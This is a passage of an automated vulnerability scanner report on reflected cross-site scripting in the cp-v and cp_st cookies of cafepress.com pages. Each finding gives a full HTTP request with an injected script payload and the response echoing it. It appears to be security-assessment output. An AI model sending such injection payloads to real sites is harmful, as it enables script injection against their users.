tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 55553
Date: Sun, 26 Dec 2010 13:47:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA9671b"-alert(1)-"c603f1ee3b3";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.123. http://www.cafepress.com/make/holiday-invitations [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-invitations

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22c12</script><script>alert(1)</script>767fea4e030 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/holiday-invitations HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=22c12</script><script>alert(1)</script>767fea4e030; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 55575
Date: Sun, 26 Dec 2010 13:47:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 55575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '22c12</script><script>alert(1)</script>767fea4e030'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.124. http://www.cafepress.com/make/holiday-photo-cards [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-photo-cards

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 744de"-alert(1)-"d438f72d6bc was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 58754
Date: Sun, 26 Dec 2010 13:47:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA744de"-alert(1)-"d438f72d6bc";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.125. http://www.cafepress.com/make/holiday-photo-cards [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/holiday-photo-cards

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acf95</script><script>alert(1)</script>565909414f4 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/holiday-photo-cards HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=acf95</script><script>alert(1)</script>565909414f4; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 58776
Date: Sun, 26 Dec 2010 13:47:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = 'acf95</script><script>alert(1)</script>565909414f4'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.126. http://www.cafepress.com/make/personalized-gifts [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c29af"-alert(1)-"a5c8b14505 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 71897
Date: Sun, 26 Dec 2010 13:47:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAc29af"-alert(1)-"a5c8b14505";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.127. http://www.cafepress.com/make/personalized-gifts [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b12</script><script>alert(1)</script>ef50e1d8ced was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=73b12</script><script>alert(1)</script>ef50e1d8ced; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 71920
Date: Sun, 26 Dec 2010 13:47:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 71920

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
omain_us = 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'Make'
window.cafepress.tealeaf.searchTerm = '73b12</script><script>alert(1)</script>ef50e1d8ced'
window.cafepress.tealeaf.salesChannel = 'Make'
window.cafepress.tealeaf.trafficMedium = 'Direct'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP
...[SNIP]...

1.128. http://www.cafepress.com/make/personalized-ornaments [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ac27"-alert(1)-"47b4bca4067 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 